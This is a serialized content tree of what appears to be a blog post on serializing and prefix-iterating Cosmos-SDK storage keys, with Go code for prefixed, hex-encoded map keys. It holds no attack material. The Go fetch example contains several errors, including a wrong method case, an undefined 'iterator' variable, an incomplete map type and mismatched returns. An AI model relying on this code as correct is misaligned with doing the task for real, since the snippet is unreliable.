PositionMapPrefix",{"type":25,"tag":216,"props":91257,"children":91258},{"style":6953},[91259],{"type":31,"value":6956},{"type":25,"tag":216,"props":91261,"children":91262},{"style":8205},[91263],{"type":31,"value":91264}," \"",{"type":25,"tag":216,"props":91266,"children":91267},{"style":52342},[91268],{"type":31,"value":91269},"\\x01",{"type":25,"tag":216,"props":91271,"children":91272},{"style":8205},[91273],{"type":31,"value":91274},"\"\n",{"type":25,"tag":216,"props":91276,"children":91277},{"class":6922,"line":7005},[91278,91283,91287,91291,91296],{"type":25,"tag":216,"props":91279,"children":91280},{"style":6947},[91281],{"type":31,"value":91282},"    AddressMapPrefix",{"type":25,"tag":216,"props":91284,"children":91285},{"style":6953},[91286],{"type":31,"value":6956},{"type":25,"tag":216,"props":91288,"children":91289},{"style":8205},[91290],{"type":31,"value":91264},{"type":25,"tag":216,"props":91292,"children":91293},{"style":52342},[91294],{"type":31,"value":91295},"\\x02",{"type":25,"tag":216,"props":91297,"children":91298},{"style":8205},[91299],{"type":31,"value":91274},{"type":25,"tag":216,"props":91301,"children":91302},{"class":6922,"line":7110},[91303],{"type":25,"tag":216,"props":91304,"children":91305},{"style":6964},[91306],{"type":31,"value":7107},{"type":25,"tag":216,"props":91308,"children":91309},{"class":6922,"line":7216},[91310],{"type":25,"tag":216,"props":91311,"children":91312},{"emptyLinePlaceholder":16},[91313],{"type":31,"value":7642},{"type":25,"tag":216,"props":91315,"children":91316},{"class":6922,"line":7244},[91317],{"type":25,"tag":216,"props":91318,"children":91319},{"emptyLinePlaceholder":16},[91320],{"type":31,"value":7642},{"type":25,"tag":216,"props":91322,"children":91323},{"class":6922,"line":7257},[91324,91328,91332],{"type":25,"tag":216,"props":91325,"children":91326},{"style":6936},[91327],{"type":31,"value":80272},{"type":25,"tag":216,"props":91329,"children":91330},{"style":7047},[91331],{"type":31,"value":90330},{"type":25,"tag":216,"props":91333,"children":91334},{"style":6964},[91335],{"type":31,"value":7420},{"type":25,"tag":216,"props":91337,"children":91338},{"class":6922,"line":7275},[91339,91343,91347],{"type":25,"tag":216,"props":91340,"children":91341},{"style":6947},[91342],{"type":31,"value":89218},{"type":25,"tag":216,"props":91344,"children":91345},{"style":7375},[91346],{"type":31,"value":80393},{"type":25,"tag":216,"props":91348,"children":91349},{"style":6964},[91350],{"type":31,"value":7465},{"type":25,"tag":216,"props":91352,"children":91353},{"class":6922,"line":7296},[91354,91358,91362,91366,91370,91374],{"type":25,"tag":216,"props":91355,"children":91356},{"style":6947},[91357],{"type":31,"value":89230},{"type":25,"tag":216,"props":91359,"children":91360},{"style":6964},[91361],{"type":31,"value":7026},{"type":25,"tag":216,"props":91363,"children":91364},{"style":6947},[91365],{"type":31,"value":89711},{"type":25,"tag":216,"props":91367,"children":91368},{"style":6964},[91369],{"type":31,"value":80199},{"type":25,"tag":216,"props":91371,"children":91372},{"style":7375},[91373],{"type":31,"value":88736},{"type":25,"tag":216,"props":91375,"children":91376},{"style":6964},[91377],{"type":31,"value":7465},{"type":25,"tag":216,"props":91379,"children":91380},{"class":6922,"line":7305},[91381,91385,91389,91393,91397],{"type":25,"tag":216,"props":91382,"children":91383},{"style":6964},[91384],{"type":31,"value":80354},{"type":25,"tag":216,"props":91386,"children":91387},{"style":6947},[91388],{"type":31,"value":76126},{"type":25,"tag":216,"props":91390,"children":91391},{"style":6964},[91392],{"type":31,"value":80199},{"type":25,"tag":216,"props":91394,"children":91395},{"style":7375},[91396],{"type":31,"value":88736},{"type":25,"tag":216,"props":91398,"children":91399},{"style":6964},[91400],{"type":31,"value":18761},{"type":25,"tag":216,"props":91402,"children":91403},{"class":6922,"line":7557},[91404,91408,91412,91416],{"type":25,"tag":216,"props":91405,"children":91406},{"style":6947},[91407],{"type":31,"value":89832},{"type":25,"tag":216,"props":91409,"children":91410},{"style":6953},[91411],{"type":31,"value":80388},{"type":25,"tag":216,"props":91413,"children":91414},{"style":7047},[91415],{"type":31,"value":89535},{"type":25,"tag":216,"props":91417,"children":91418},{"style":6964},[91419],{"type":31,"value":7420},{"type":25,"tag":216,"props":91421,"children":91422},{"class":6922,"line":7574},[91423,91427,91431],{"type":25,"tag":216,"props":91424,"children":91425},{"style":6964},[91426],{"type":31,"value":90426},{"type":25,"tag":216,"props":91428,"children":91429},{"style":7375},[91430],{"type":31,"value":88736},{"type":25,"tag":216,"props":91432,"children":91433},{"style":6964},[91434],{"type":31,"value":7465},{"type":25,"tag":216,"props":91436,"children":91437},{"class":6922,"line":7591},[91438,91442,91446,91450,91454,91458,91462,91466],{"type":25,"tag":216,"props":91439,"children":91440},{"style":6947},[91441],{"type":31,"value":90442},{"type":25,"tag":216,"props":91443,"children":91444},{"style":6964},[91445],{"type":31,"value":179},{"type":25,"tag":216,"props":91447,"children":91448},{"style":7047},[91449],{"type":31,"value":89572},{"type":25,"tag":216,"props":91451,"children":91452},{"style":6964},[91453],{"type":31,"value":1850},{"type":25,"tag":216,"props":91455,"children":91456},{"style":7047},[91457],{"type":31,"value":13094},{"type":25,"tag":216,"props":91459,"children":91460},{"style":6964},[91461],{"type":31,"value":1850},{"type":25,"tag":216,"props":91463,"children":91464},{"style":6947},[91465],{"type":31,"value":89442},{"type":25,"tag":216,"props":91467,"children":91468},{"style":6964},[91469],{"type":31,"value":89593},{"type":25,"tag":216,"props":91471,"children":91472},{"class":6922,"line":7604},[91473],{"type":25,"tag":216,"props":91474,"children":91475},{"style":6964},[91476],{"type":31,"value":27876},{"type":25,"tag":216,"props":91478,"children":91479},{"class":6922,"line":7613},[91480,91484,91488,91492,91496,91500,91504,91508],{"type":25,"tag":216,"props":91481,"children":91482},{"style":6947},[91483],{"type":31,"value":89563},{"type":25,"tag":216,"props":91485,"children":91486},{"style":6964},[91487],{"type":31,"value":179},{"type":25,"tag":216,"props":91489,"children":91490},{"style":7047},[91491],{"type":31,"value":89617},{"type":25,"tag":216,"props":91493,"children":91494},{"style":6964},[91495],{"type":31,"value":1850},{"type":25,"tag":216,"props":91497,"children":91498},{"style":6947},[91499],{"type":31,"value":89526},{"type":25,"tag":216,"props":91501,"children":91502},{"style":6964},[91503],{"type":31,"value":7026},{"type":25,"tag":216,"props":91505,"children":91506},{"style":6947},[91507],{"type":31,"value":89442},{"type":25,"tag":216,"props":91509,"children":91510},{"style":6964},[91511],{"type":31,"value":7107},{"type":25,"tag":216,"props":91513,"children":91514},{"class":6922,"line":7636},[91515],{"type":25,"tag":216,"props":91516,"children":91517},{"emptyLinePlaceholder":16},[91518],{"type":31,"value":7642},{"type":25,"tag":216,"props":91520,"children":91521},{"class":6922,"line":7645},[91522,91526,91530,91534],{"type":25,"tag":216,"props":91523,"children":91524},{"style":6947},[91525],{"type":31,"value":90527},{"type":25,"tag":216,"props":91527,"children":91528},{"style":6953},[91529],{"type":31,"value":80388},{"type":25,"tag":216,"props":91531,"children":91532},{"style":7047},[91533],{"type":31,"value":89535},{"type":25,"tag":216,"props":91535,"children":91536},{"style":6964},[91537],{"type":31,"value":7420},{"type":25,"tag":216,"props":91539,"children":91540},{"class":6922,"line":7654},[91541,91545,91549],{"type":25,"tag":216,"props":91542,"children":91543},{"style":6964},[91544],{"type":31,"value":90426},{"type":25,"tag":216,"props":91546,"children":91547},{"style":7375},[91548],{"type":31,"value":88736},{"type":25,"tag":216,"props":91550,"children":91551},{"style":6964},[91552],{"type":31,"value":7465},{"type":25,"tag":216,"props":91554,"children":91555},{"class":6922,"line":7722},[91556,91560,91564,91568,91572,91576,91580,91584],{"type":25,"tag":216,"props":91557,"children":91558},{"style":6947},[91559],{"type":31,"value":90442},{"type":25,"tag":216,"props":91561,"children":91562},{"style":6964},[91563],{"type":31,"value":179},{"type":25,"tag":216,"props":91565,"children":91566},{"style":7047},[91567],{"type":31,"value":89572},{"type":25,"tag":216,"props":91569,"children":91570},{"style":6964},[91571],{"type":31,"value":1850},{"type":25,"tag":216,"props":91573,"children":91574},{"style":7047},[91575],{"type":31,"value":13094},{"type":25,"tag":216,"props":91577,"children":91578},{"style":6964},[91579],{"type":31,"value":1850},{"type":25,"tag":216,"props":91581,"children":91582},{"style":6947},[91583],{"type":31,"value":89711},{"type":25,"tag":216,"props":91585,"children":91586},{"style":6964},[91587],{"type":31,"value":89593},{"type":25,"tag":216,"props":91589,"children":91590},{"class":6922,"line":7730},[91591],{"type":25,"tag":216,"props":91592,"children":91593},{"style":6964},[91594],{"type":31,"value":27876},{"type":25,"tag":216,"props":91596,"children":91597},{"class":6922,"line":7760},[91598,91602,91606,91610,91614,91618,91622,91626],{"type":25,"tag":216,"props":91599,"children":91600},{"style":6947},[91601],{"type":31,"value":89563},{"type":25,"tag":216,"props":91603,"children":91604},{"style":6964},[91605],{"type":31,"value":179},{"type":25,"tag":216,"props":91607,"children":91608},{"style":7047},[91609],{"type":31,"value":89617},{"type":25,"tag":216,"props":91611,"children":91612},{"style":6964},[91613],{"type":31,"value":1850},{"type":25,"tag":216,"props":91615,"children":91616},{"style":6947},[91617],{"type":31,"value":89652},{"type":25,"tag":216,"props":91619,"children":91620},{"style":6964},[91621],{"type":31,"value":7026},{"type":25,"tag":216,"props":91623,"children":91624},{"style":6947},[91625],{"type":31,"value":89711},{"type":25,"tag":216,"props":91627,"children":91628},{"style":6964},[91629],{"type":31,"value":7107},{"type":25,"tag":216,"props":91631,"children":91632},{"class":6922,"line":7768},[91633],{"type":25,"tag":216,"props":91634,"children":91635},{"emptyLinePlaceholder":16},[91636],{"type":31,"value":7642},{"type":25,"tag":216,"props":91638,"children":91639},{"class":6922,"line":7800},[91640,91644,91648,91652,91656,91660],{"type":25,"tag":216,"props":91641,"children":91642},{"style":6947},[91643],{"type":31,"value":90646},{"type":25,"tag":216,"props":91645,"children":91646},{"style":6953},[91647],{"type":31,"value":80388},{"type":25,"tag":216,"props":91649,"children":91650},{"style":6947},[91651],{"type":31,"value":86206},{"type":25,"tag":216,"props":91653,"children":91654},{"style":6964},[91655],{"type":31,"value":179},{"type":25,"tag":216,"props":91657,"children":91658},{"style":7047},[91659],{"type":31,"value":89194},{"type":25,"tag":216,"props":91661,"children":91662},{"style":6964},[91663],{"type":31,"value":7420},{"type":25,"tag":216,"props":91665,"children":91666},{"class":6922,"line":7808},[91667,91672],{"type":25,"tag":216,"props":91668,"children":91669},{"style":8205},[91670],{"type":31,"value":91671},"        \"%s%d%s%s%s%s\"",{"type":25,"tag":216,"props":91673,"children":91674},{"style":6964},[91675],{"type":31,"value":7465},{"type":25,"tag":216,"props":91677,"children":91678},{"class":6922,"line":7868},[91679,91684],{"type":25,"tag":216,"props":91680,"children":91681},{"style":6947},[91682],{"type":31,"value":91683},"        PositionMapPrefix",{"type":25,"tag":216,"props":91685,"children":91686},{"style":6964},[91687],{"type":31,"value":7465},{"type":25,"tag":216,"props":91689,"children":91690},{"class":6922,"line":13001},[91691,91695],{"type":25,"tag":216,"props":91692,"children":91693},{"style":6947},[91694],{"type":31,"value":90686},{"type":25,"tag":216,"props":91696,"children":91697},{"style":6964},[91698],{"type":31,"value":7465},{"type":25,"tag":216,"props":91700,"children":91701},{"class":6922,"line":13019},[91702,91706],{"type":25,"tag":216,"props":91703,"children":91704},{"style":6947},[91705],{"type":31,"value":90698},{"type":25,"tag":216,"props":91707,"children":91708},{"style":6964},[91709],{"type":31,"value":7465},{"type":25,"tag":216,"props":91711,"children":91712},{"class":6922,"line":13064},[91713,91717],{"type":25,"tag":216,"props":91714,"children":91715},{"style":6947},[91716],{"type":31,"value":90710},{"type":25,"tag":216,"props":91718,"children":91719},{"style":6964},[91720],{"type":31,"value":7465},{"type":25,"tag":216,"props":91722,"children":91723},{"class":6922,"line":13170},[91724,91728],{"type":25,"tag":216,"props":91725,"children":91726},{"style":6947},[91727],{"type":31,"value":90698},{"type":25,"tag":216,"props":91729,"children":91730},{"style":6964},[91731],{"type":31,"value":7465},{"type":25,"tag":216,"props":91733,"children":91734},{"class":6922,"line":27455},[91735,91739],{"type":25,"tag":216,"props":91736,"children":91737},{"style":6947},[91738],{"type":31,"value":90733},{"type":25,"tag":216,"props":91740,"children":91741},{"style":6964},[91742],{"type":31,"value":7465},{"type":25,"tag":216,"props":91744,"children":91745},{"class":6922,"line":27490},[91746],{"type":25,"tag":216,"props":91747,"children":91748},{"style":6964},[91749],{"type":31,"value":27876},{"type":25,"tag":216,"props":91751,"children":91752},{"class":6922,"line":27498},[91753],{"type":25,"tag":216,"props":91754,"children":91755},{"style":6964},[91756],{"type":31,"value":7874},{"type":25,"tag":216,"props":91758,"children":91759},{"class":6922,"line":27506},[91760],{"type":25,"tag":216,"props":91761,"children":91762},{"emptyLinePlaceholder":16},[91763],{"type":31,"value":7642},{"type":25,"tag":216,"props":91765,"children":91766},{"class":6922,"line":27515},[91767],{"type":25,"tag":216,"props":91768,"children":91769},{"emptyLinePlaceholder":16},[91770],{"type":31,"value":7642},{"type":25,"tag":216,"props":91772,"children":91773},{"class":6922,"line":27557},[91774,91778,91782],{"type":25,"tag":216,"props":91775,"children":91776},{"style":6936},[91777],{"type":31,"value":80272},{"type":25,"tag":216,"props":91779,"children":91780},{"style":7047},[91781],{"type":31,"value":90777},{"type":25,"tag":216,"props":91783,"children":91784},{"style":6964},[91785],{"type":31,"value":7420},{"type":25,"tag":216,"props":91787,"children":91788},{"class":6922,"line":27590},[91789,91793,91797],{"type":25,"tag":216,"props":91790,"children":91791},{"style":6947},[91792],{"type":31,"value":89218},{"type":25,"tag":216,"props":91794,"children":91795},{"style":7375},[91796],{"type":31,"value":80393},{"type":25,"tag":216,"props":91798,"children":91799},{"style":6964},[91800],{"type":31,"value":7465},{"type":25,"tag":216,"props":91802,"children":91803},{"class":6922,"line":27598},[91804,91808,91812,91816,91820,91824],{"type":25,"tag":216,"props":91805,"children":91806},{"style":6947},[91807],{"type":31,"value":89230},{"type":25,"tag":216,"props":91809,"children":91810},{"style":6964},[91811],{"type":31,"value":7026},{"type":25,"tag":216,"props":91813,"children":91814},{"style":6947},[91815],{"type":31,"value":90812},{"type":25,"tag":216,"props":91817,"children":91818},{"style":6964},[91819],{"type":31,"value":80199},{"type":25,"tag":216,"props":91821,"children":91822},{"style":7375},[91823],{"type":31,"value":88736},{"type":25,"tag":216,"props":91825,"children":91826},{"style":6964},[91827],{"type":31,"value":7465},{"type":25,"tag":216,"props":91829,"children":91830},{"class":6922,"line":27606},[91831,91835,91839,91843,91847],{"type":25,"tag":216,"props":91832,"children":91833},{"style":6964},[91834],{"type":31,"value":80354},{"type":25,"tag":216,"props":91836,"children":91837},{"style":6947},[91838],{"type":31,"value":76126},{"type":25,"tag":216,"props":91840,"children":91841},{"style":6964},[91842],{"type":31,"value":80199},{"type":25,"tag":216,"props":91844,"children":91845},{"style":7375},[91846],{"type":31,"value":88736},{"type":25,"tag":216,"props":91848,"children":91849},{"style":6964},[91850],{"type":31,"value":18761},{"type":25,"tag":216,"props":91852,"children":91853},{"class":6922,"line":27615},[91854,91858,91862,91866],{"type":25,"tag":216,"props":91855,"children":91856},{"style":6947},[91857],{"type":31,"value":89832},{"type":25,"tag":216,"props":91859,"children":91860},{"style":6953},[91861],{"type":31,"value":80388},{"type":25,"tag":216,"props":91863,"children":91864},{"style":7047},[91865],{"type":31,"value":89535},{"type":25,"tag":216,"props":91867,"children":91868},{"style":6964},[91869],{"type":31,"value":7420},{"type":25,"tag":216,"props":91871,"children":91872},{"class":6922,"line":27691},[91873,91877,91881],{"type":25,"tag":216,"props":91874,"children":91875},{"style":6964},[91876],{"type":31,"value":90426},{"type":25,"tag":216,"props":91878,"children":91879},{"style":7375},[91880],{"type":31,"value":88736},{"type":25,"tag":216,"props":91882,"children":91883},{"style":6964},[91884],{"type":31,"value":7465},{"type":25,"tag":216,"props":91886,"children":91887},{"class":6922,"line":27724},[91888,91892,91896,91900,91904,91908,91912,91916],{"type":25,"tag":216,"props":91889,"children":91890},{"style":6947},[91891],{"type":31,"value":90442},{"type":25,"tag":216,"props":91893,"children":91894},{"style":6964},[91895],{"type":31,"value":179},{"type":25,"tag":216,"props":91897,"children":91898},{"style":7047},[91899],{"type":31,"value":89572},{"type":25,"tag":216,"props":91901,"children":91902},{"style":6964},[91903],{"type":31,"value":1850},{"type":25,"tag":216,"props":91905,"children":91906},{"style":7047},[91907],{"type":31,"value":13094},{"type":25,"tag":216,"props":91909,"children":91910},{"style":6964},[91911],{"type":31,"value":1850},{"type":25,"tag":216,"props":91913,"children":91914},{"style":6947},[91915],{"type":31,"value":89442},{"type":25,"tag":216,"props":91917,"children":91918},{"style":6964},[91919],{"type":31,"value":89593},{"type":25,"tag":216,"props":91921,"children":91922},{"class":6922,"line":27732},[91923],{"type":25,"tag":216,"props":91924,"children":91925},{"style":6964},[91926],{"type":31,"value":27876},{"type":25,"tag":216,"props":91928,"children":91929},{"class":6922,"line":27740},[91930,91934,91938,91942,91946,91950,91954,91958],{"type":25,"tag":216,"props":91931,"children":91932},{"style":6947},[91933],{"type":31,"value":89563},{"type":25,"tag":216,"props":91935,"children":91936},{"style":6964},[91937],{"type":31,"value":179},{"type":25,"tag":216,"props":91939,"children":91940},{"style":7047},[91941],{"type":31,"value":89617},{"type":25,"tag":216,"props":91943,"children":91944},{"style":6964},[91945],{"type":31,"value":1850},{"type":25,"tag":216,"props":91947,"children":91948},{"style":6947},[91949],{"type":31,"value":89526},{"type":25,"tag":216,"props":91951,"children":91952},{"style":6964},[91953],{"type":31,"value":7026},{"type":25,"tag":216,"props":91955,"children":91956},{"style":6947},[91957],{"type":31,"value":89442},{"type":25,"tag":216,"props":91959,"children":91960},{"style":6964},[91961],{"type":31,"value":7107},{"type":25,"tag":216,"props":91963,"children":91964},{"class":6922,"line":27777},[91965],{"type":25,"tag":216,"props":91966,"children":91967},{"emptyLinePlaceholder":16},[91968],{"type":31,"value":7642},{"type":25,"tag":216,"props":91970,"children":91971},{"class":6922,"line":27790},[91972,91976,91980,91984],{"type":25,"tag":216,"props":91973,"children":91974},{"style":6947},[91975],{"type":31,"value":90969},{"type":25,"tag":216,"props":91977,"children":91978},{"style":6953},[91979],{"type":31,"value":80388},{"type":25,"tag":216,"props":91981,"children":91982},{"style":7047},[91983],{"type":31,"value":89535},{"type":25,"tag":216,"props":91985,"children":91986},{"style":6964},[91987],{"type":31,"value":7420},{"type":25,"tag":216,"props":91989,"children":91990},{"class":6922,"line":27803},[91991,91995,91999],{"type":25,"tag":216,"props":91992,"children":91993},{"style":6964},[91994],{"type":31,"value":90426},{"type":25,"tag":216,"props":91996,"children":91997},{"style":7375},[91998],{"type":31,"value":88736},{"type":25,"tag":216,"props":92000,"children":92001},{"style":6964},[92002],{"type":31,"value":7465},{"type":25,"tag":216,"props":92004,"children":92005},{"class":6922,"line":27816},[92006,92010,92014,92018,92022,92026,92030,92034],{"type":25,"tag":216,"props":92007,"children":92008},{"style":6947},[92009],{"type":31,"value":90442},{"type":25,"tag":216,"props":92011,"children":92012},{"style":6964},[92013],{"type":31,"value":179},{"type":25,"tag":216,"props":92015,"children":92016},{"style":7047},[92017],{"type":31,"value":89572},{"type":25,"tag":216,"props":92019,"children":92020},{"style":6964},[92021],{"type":31,"value":1850},{"type":25,"tag":216,"props":92023,"children":92024},{"style":7047},[92025],{"type":31,"value":13094},{"type":25,"tag":216,"props":92027,"children":92028},{"style":6964},[92029],{"type":31,"value":1850},{"type":25,"tag":216,"props":92031,"children":92032},{"style":6947},[92033],{"type":31,"value":90812},{"type":25,"tag":216,"props":92035,"children":92036},{"style":6964},[92037],{"type":31,"value":89593},{"type":25,"tag":216,"props":92039,"children":92040},{"class":6922,"line":27870},[92041],{"type":25,"tag":216,"props":92042,"children":92043},{"style":6964},[92044],{"type":31,"value":27876},{"type":25,"tag":216,"props":92046,"children":92047},{"class":6922,"line":27879},[92048,92052,92056,92060,92064,92068,92072,92076],{"type":25,"tag":216,"props":92049,"children":92050},{"style":6947},[92051],{"type":31,"value":89563},{"type":25,"tag":216,"props":92053,"children":92054},{"style":6964},[92055],{"type":31,"value":179},{"type":25,"tag":216,"props":92057,"children":92058},{"style":7047},[92059],{"type":31,"value":89617},{"type":25,"tag":216,"props":92061,"children":92062},{"style":6964},[92063],{"type":31,"value":1850},{"type":25,"tag":216,"props":92065,"children":92066},{"style":6947},[92067],{"type":31,"value":91062},{"type":25,"tag":216,"props":92069,"children":92070},{"style":6964},[92071],{"type":31,"value":7026},{"type":25,"tag":216,"props":92073,"children":92074},{"style":6947},[92075],{"type":31,"value":90812},{"type":25,"tag":216,"props":92077,"children":92078},{"style":6964},[92079],{"type":31,"value":7107},{"type":25,"tag":216,"props":92081,"children":92082},{"class":6922,"line":36243},[92083],{"type":25,"tag":216,"props":92084,"children":92085},{"emptyLinePlaceholder":16},[92086],{"type":31,"value":7642},{"type":25,"tag":216,"props":92088,"children":92089},{"class":6922,"line":36264},[92090,92094,92098,92102,92106,92110],{"type":25,"tag":216,"props":92091,"children":92092},{"style":6947},[92093],{"type":31,"value":90646},{"type":25,"tag":216,"props":92095,"children":92096},{"style":6953},[92097],{"type":31,"value":80388},{"type":25,"tag":216,"props":92099,"children":92100},{"style":6947},[92101],{"type":31,"value":86206},{"type":25,"tag":216,"props":92103,"children":92104},{"style":6964},[92105],{"type":31,"value":179},{"type":25,"tag":216,"props":92107,"children":92108},{"style":7047},[92109],{"type":31,"value":89194},{"type":25,"tag":216,"props":92111,"children":92112},{"style":6964},[92113],{"type":31,"value":7420},{"type":25,"tag":216,"props":92115,"children":92116},{"class":6922,"line":84923},[92117,92121],{"type":25,"tag":216,"props":92118,"children":92119},{"style":8205},[92120],{"type":31,"value":91671},{"type":25,"tag":216,"props":92122,"children":92123},{"style":6964},[92124],{"type":31,"value":7465},{"type":25,"tag":216,"props":92126,"children":92127},{"class":6922,"line":84936},[92128,92133],{"type":25,"tag":216,"props":92129,"children":92130},{"style":6947},[92131],{"type":31,"value":92132},"        AddressMapPrefix",{"type":25,"tag":216,"props":92134,"children":92135},{"style":6964},[92136],{"type":31,"value":7465},{"type":25,"tag":216,"props":92138,"children":92139},{"class":6922,"line":84944},[92140,92144],{"type":25,"tag":216,"props":92141,"children":92142},{"style":6947},[92143],{"type":31,"value":90686},{"type":25,"tag":216,"props":92145,"children":92146},{"style":6964},[92147],{"type":31,"value":7465},{"type":25,"tag":216,"props":92149,"children":92150},{"class":6922,"line":84952},[92151,92155],{"type":25,"tag":216,"props":92152,"children":92153},{"style":6947},[92154],{"type":31,"value":90698},{"type":25,"tag":216,"props":92156,"children":92157},{"style":6964},[92158],{"type":31,"value":7465},{"type":25,"tag":216,"props":92160,"children":92161},{"class":6922,"line":84960},[92162,92166],{"type":25,"tag":216,"props":92163,"children":92164},{"style":6947},[92165],{"type":31,"value":90710},{"type":25,"tag":216,"props":92167,"children":92168},{"style":6964},[92169],{"type":31,"value":7465},{"type":25,"tag":216,"props":92171,"children":92172},{"class":6922,"line":85000},[92173,92177],{"type":25,"tag":216,"props":92174,"children":92175},{"style":6947},[92176],{"type":31,"value":90698},{"type":25,"tag":216,"props":92178,"children":92179},{"style":6964},[92180],{"type":31,"value":7465},{"type":25,"tag":216,"props":92182,"children":92183},{"class":6922,"line":85008},[92184,92188],{"type":25,"tag":216,"props":92185,"children":92186},{"style":6947},[92187],{"type":31,"value":91171},{"type":25,"tag":216,"props":92189,"children":92190},{"style":6964},[92191],{"type":31,"value":7465},{"type":25,"tag":216,"props":92193,"children":92195},{"class":6922,"line":92194},60,[92196],{"type":25,"tag":216,"props":92197,"children":92198},{"style":6964},[92199],{"type":31,"value":27876},{"type":25,"tag":216,"props":92201,"children":92203},{"class":6922,"line":92202},61,[92204],{"type":25,"tag":216,"props":92205,"children":92206},{"style":6964},[92207],{"type":31,"value":7874},{"type":25,"tag":38,"props":92209,"children":92210},{},[92211],{"type":31,"value":92212},"We now have a proper example of how to serialize storage keys.",{"type":25,"tag":38,"props":92214,"children":92215},{},[92216,92218,92223],{"type":31,"value":92217},"Nonetheless, there is more to storage than just this. As previously mentioned, storages are expected to support their original functionalities. In the case of ",{"type":25,"tag":82,"props":92219,"children":92221},{"className":92220},[],[92222],{"type":31,"value":71071},{"type":31,"value":92224},", data should still be retrievable through original keys.",{"type":25,"tag":38,"props":92226,"children":92227},{},[92228,92230,92236,92238,92243],{"type":31,"value":92229},"Let's look at a case where we want to retrieve all ",{"type":25,"tag":82,"props":92231,"children":92233},{"className":92232},[],[92234],{"type":31,"value":92235},"map[Username]map[PositionName]Position",{"type":31,"value":92237}," associated with a ",{"type":25,"tag":82,"props":92239,"children":92241},{"className":92240},[],[92242],{"type":31,"value":89106},{"type":31,"value":92244}," from the storage. How can we safely accomplish this?",{"type":25,"tag":38,"props":92246,"children":92247},{},[92248,92250,92255,92257,92263],{"type":31,"value":92249},"Fortunately, the Cosmos-SDK provides APIs to fetch all entries associated with a ",{"type":25,"tag":82,"props":92251,"children":92253},{"className":92252},[],[92254],{"type":31,"value":89177},{"type":31,"value":92256}," prefix. Below is an example of an attempt to fetch data with ",{"type":25,"tag":82,"props":92258,"children":92260},{"className":92259},[],[92261],{"type":31,"value":92262},"vaultId",{"type":31,"value":1472},{"type":25,"tag":206,"props":92265,"children":92267},{"code":92266,"language":80136,"meta":7,"className":80137,"style":7},"func FetchPositionMapWithVaultId(\n    vaultId uint64,\n) ([]map[Username]map[PositionName]Position) {\n    values := map[Username]map[PositionName]Position{}\n    i := sdk.KVStorePrefixIterator(\n        kvStore,\n        fmt.Sprintf(\"%s%d\", PositionMapPrefix, vaultId)\n    )\n    for ; i.Valid(); i.Next() {\n        k := strings.split(i.Key(), Seperator)\n\n        username := make([]byte, hex.DecodedLen(k[0]))\n        _, err := hex.Decode(username, k[0])\n        if err != nil {\n            return nil, err\n        }\n\n        positionName := make([]byte, hex.DecodedLen(k[1]))\n        _, err := hex.Decode(positionName, k[1])\n        if err != nil {\n            return nil, err\n        }\n\n        if entry, ok := values[username]; !ok {\n            values[username] = make(map[PositionName])\n        }\n\n        values[username][positionName] = Position {\n            data: iterator.Value(),\n        }\n    }\n    return values\n}\n",[92268],{"type":25,"tag":82,"props":92269,"children":92270},{"__ignoreMap":7},[92271,92287,92302,92351,92403,92432,92444,92490,92497,92543,92598,92605,92669,92730,92753,92772,92779,92786,92846,92905,92928,92947,92954,92961,93014,93062,93069,93076,93116,93145,93152,93159,93171],{"type":25,"tag":216,"props":92272,"children":92273},{"class":6922,"line":6923},[92274,92278,92283],{"type":25,"tag":216,"props":92275,"children":92276},{"style":6936},[92277],{"type":31,"value":80272},{"type":25,"tag":216,"props":92279,"children":92280},{"style":7047},[92281],{"type":31,"value":92282}," FetchPositionMapWithVaultId",{"type":25,"tag":216,"props":92284,"children":92285},{"style":6964},[92286],{"type":31,"value":7420},{"type":25,"tag":216,"props":92288,"children":92289},{"class":6922,"line":6769},[92290,92294,92298],{"type":25,"tag":216,"props":92291,"children":92292},{"style":6947},[92293],{"type":31,"value":89218},{"type":25,"tag":216,"props":92295,"children":92296},{"style":7375},[92297],{"type":31,"value":80393},{"type":25,"tag":216,"props":92299,"children":92300},{"style":6964},[92301],{"type":31,"value":7465},{"type":25,"tag":216,"props":92303,"children":92304},{"class":6922,"line":6778},[92305,92310,92314,92318,92322,92326,92330,92334,92338,92342,92347],{"type":25,"tag":216,"props":92306,"children":92307},{"style":6964},[92308],{"type":31,"value":92309},") ([]",{"type":25,"tag":216,"props":92311,"children":92312},{"style":6936},[92313],{"type":31,"value":71071},{"type":25,"tag":216,"props":92315,"children":92316},{"style":6964},[92317],{"type":31,"value":7701},{"type":25,"tag":216,"props":92319,"children":92320},{"style":7375},[92321],{"type":31,"value":89123},{"type":25,"tag":216,"props":92323,"children":92324},{"style":6964},[92325],{"type":31,"value":19368},{"type":25,"tag":216,"props":92327,"children":92328},{"style":6936},[92329],{"type":31,"value":71071},{"type":25,"tag":216,"props":92331,"children":92332},{"style":6964},[92333],{"type":31,"value":7701},{"type":25,"tag":216,"props":92335,"children":92336},{"style":7375},[92337],{"type":31,"value":89140},{"type":25,"tag":216,"props":92339,"children":92340},{"style":6964},[92341],{"type":31,"value":19368},{"type":25,"tag":216,"props":92343,"children":92344},{"style":7375},[92345],{"type":31,"value":92346},"Position",{"type":25,"tag":216,"props":92348,"children":92349},{"style":6964},[92350],{"type":31,"value":18761},{"type":25,"tag":216,"props":92352,"children":92353},{"class":6922,"line":7005},[92354,92359,92363,92367,92371,92375,92379,92383,92387,92391,92395,92399],{"type":25,"tag":216,"props":92355,"children":92356},{"style":6947},[92357],{"type":31,"value":92358},"    values",{"type":25,"tag":216,"props":92360,"children":92361},{"style":6953},[92362],{"type":31,"value":80388},{"type":25,"tag":216,"props":92364,"children":92365},{"style":6936},[92366],{"type":31,"value":53637},{"type":25,"tag":216,"props":92368,"children":92369},{"style":6964},[92370],{"type":31,"value":7701},{"type":25,"tag":216,"props":92372,"children":92373},{"style":7375},[92374],{"type":31,"value":89123},{"type":25,"tag":216,"props":92376,"children":92377},{"style":6964},[92378],{"type":31,"value":19368},{"type":25,"tag":216,"props":92380,"children":92381},{"style":6936},[92382],{"type":31,"value":71071},{"type":25,"tag":216,"props":92384,"children":92385},{"style":6964},[92386],{"type":31,"value":7701},{"type":25,"tag":216,"props":92388,"children":92389},{"style":7375},[92390],{"type":31,"value":89140},{"type":25,"tag":216,"props":92392,"children":92393},{"style":6964},[92394],{"type":31,"value":19368},{"type":25,"tag":216,"props":92396,"children":92397},{"style":7375},[92398],{"type":31,"value":92346},{"type":25,"tag":216,"props":92400,"children":92401},{"style":6964},[92402],{"type":31,"value":82069},{"type":25,"tag":216,"props":92404,"children":92405},{"class":6922,"line":7110},[92406,92411,92415,92419,92423,92428],{"type":25,"tag":216,"props":92407,"children":92408},{"style":6947},[92409],{"type":31,"value":92410},"    